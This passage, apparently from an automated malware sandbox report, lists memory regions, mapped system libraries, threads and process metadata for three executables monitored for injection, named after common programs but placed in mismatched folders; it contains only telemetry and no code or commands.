Region: id = 2499 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2501 start_va = 0x5e0000 end_va = 0x75bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Thread: id = 122 os_tid = 0x1030 Thread: id = 123 os_tid = 0x1014 Process: id = "28" image_name = "skype.exe" filename = "c:\\program files\\windows portable devices\\skype.exe" page_root = "0x1d62f000" os_pid = "0x101c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\skype.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2502 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2503 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2504 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2505 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2506 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2507 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2508 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2509 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2510 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2511 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2512 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2513 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2514 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2515 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2516 start_va = 0x540000 end_va = 0x5fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2517 start_va = 0x740000 end_va = 0x8c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2518 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 2519 start_va = 0xa60000 end_va = 0xa76fff monitored = 0 entry_point = 0xa614a1 region_type = mapped_file name = "skype.exe" filename = "\\Program Files\\Windows Portable Devices\\skype.exe" (normalized: "c:\\program files\\windows portable devices\\skype.exe") Region: id = 2520 start_va = 0xa80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 2521 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 2522 start_va = 0x1f20000 end_va = 0x1fdbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 2523 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 2524 start_va = 0x2110000 end_va = 0x2ad3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002110000" filename = "" Region: id = 2525 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2526 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2527 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2528 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2529 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2530 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2531 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2532 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2533 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2534 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2535 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2536 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2537 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2538 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2539 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2540 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2541 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2542 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2543 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2544 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2545 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2546 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2547 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2548 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2549 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2550 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2552 start_va = 0x2ae0000 end_va = 0x2c85fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ae0000" filename = "" Thread: id = 124 os_tid = 0x102c Thread: id = 125 os_tid = 0x1020 Process: id = "29" image_name = "smartftp.exe" filename = "c:\\program files\\windows photo viewer\\smartftp.exe" page_root = "0x67651000" os_pid = "0x1024" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\Windows Photo Viewer\\smartftp.exe\" " cur_dir = "C:\\Program Files\\Windows Photo Viewer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2554 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2555 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2556 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2557 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2558 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2559 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2560 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2561 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2562 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2563 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2564 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2565 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2566 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2567 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2568 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2569 start_va = 0x740000 end_va = 0x8c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2570 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 2571 start_va = 0xaf0000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 2572 start_va = 0xb00000 end_va = 0xbbbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 2573 start_va = 0xbd0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 2574 start_va = 0xc30000 end_va = 0xc46fff monitored = 0 entry_point = 0xc314a1 region_type = mapped_file name = "smartftp.exe" filename = "\\Program Files\\Windows Photo Viewer\\smartftp.exe" (normalized: "c:\\program files\\windows photo viewer\\smartftp.exe") Region: id = 2575 start_va = 0xc50000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 2576 start_va = 0x2050000 end_va = 0x2a13fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002050000" filename = "" Region: id = 2577 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2578 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2579 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2580 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2581 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2582 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2583 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2584 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2585 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2586 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2587 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2588 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2589 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2590 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2591 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2592 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2593 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2594 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2595 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2596 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2597 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2598 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2599 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2600 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2601 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2602 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2604 start_va = 0x640000 end_va = 0x6fafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Thread: id = 126 os_tid = 0x1044 Thread: id = 127 os_tid = 0x1028 Process: id = "30" image_name = "thunderbird.exe" filename = "c:\\program files (x86)\\microsoft office\\thunderbird.exe" page_root = "0x69763000" os_pid = "0x1034" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\thunderbird.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft Office\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2605 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2606 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2607 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2608 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2609 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2610 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2611 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2612 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2613 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2614 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2615 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2616 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2617 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2618 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2619 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 2620 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 2621 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 2622 start_va = 0xb10000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 2623 start_va = 0xb20000 end_va = 0xbdbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 2624 start_va = 0xc00000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 2625 start_va = 0x13b0000 end_va = 0x13c6fff monitored = 0 entry_point = 0x13b14a1 region_type = mapped_file name = "thunderbird.exe" filename = "\\Program Files (x86)\\Microsoft Office\\thunderbird.exe" (normalized: "c:\\program files (x86)\\microsoft office\\thunderbird.exe") Region: id = 2626 start_va = 0x13d0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013d0000" filename = "" Region: id = 2627 start_va = 0x27d0000 end_va = 0x3193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027d0000" filename = "" Region: id = 2628 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2629 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2630 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2631 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2632 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2633 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2634 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2635 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2636 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2637 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = 